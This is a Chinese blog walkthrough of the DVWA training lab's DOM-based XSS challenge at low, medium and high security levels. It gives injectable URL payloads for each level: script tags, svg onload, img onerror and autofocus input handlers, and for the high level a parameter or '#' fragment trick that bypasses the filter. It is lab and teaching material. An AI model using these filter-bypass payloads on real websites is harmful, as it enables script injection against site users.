【dvwa靶场:XSS系列】XSS (DOM) 低-中-高级别,通关啦

一、低级low

拼接的url样式:​​​​​​​

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default= 拼接的新内容

复制代码
<script>alert("假客套")</script>

二、中级middle

拼接的url样式:​​​​​​​
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default= 拼接的新内容

过滤了script,使用其他标签拼接新的,新的拼接如下四选一

复制代码
</select><svg onload=alert('假客套');>

</select><img src=x onerror=alert("假客套")>

注意这里的autofocus会一直自动加载弹窗,不加无效

复制代码
<select><input onfocus = alert('假客套') autofocus/>

"><input onfocus = alert('假客套') autofocus/>

三、高级high

拼接的url样式:

​​​​​​​http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English 拼接的新内容

过滤了script,使用其他标签拼接新的,新的拼接如下二选一

自定义一个参数名,拼接假的采纳数传递过去,比如不存在的name

复制代码
&name=<script>alert("假客套")</script>

# 注释掉后续不传给后端,也不过滤

复制代码
#<script>alert("假客套")</script>
相关推荐
Suckerbin22 分钟前
DarkHole: 2靶场渗透
笔记·安全·web安全·网络安全
喜葵36 分钟前
前端安全防护深度实践:从XSS到供应链攻击的全面防御
前端·安全·xss
lingggggaaaa3 小时前
小迪安全v2023学习笔记(七十八讲)—— 数据库安全&Redis&CouchDB&H2database&未授权&CVE
redis·笔记·学习·算法·安全·网络安全·couchdb
塔子终结者9 小时前
网络安全A模块专项练习任务十解析
java·服务器·网络安全
2301_780789669 小时前
渗透测试与网络安全审计的关系
网络·数据库·安全·web安全·网络安全
王火火(DDoS CC防护)10 小时前
服务器IP暴露被攻击了怎么办?
服务器·网络安全·ddos攻击
卓码软件测评13 小时前
第三方web测评机构:【WEB安全测试中HTTP方法(GET/POST/PUT)的安全风险检测】
前端·网络协议·安全·web安全·http·xss
2401_8653825014 小时前
各省市信息化项目管理办法中的网络安全等级保护如何规定的?
网络安全·信息化项目·项目审批
被巨款砸中21 小时前
前端视角下的 Web 安全攻防:XSS、CSRF、DDoS 一次看懂
前端·安全·xss
墨染 殇雪1 天前
文件上传漏洞基础及挖掘流程
网络安全·漏洞分析·漏洞挖掘·安全机制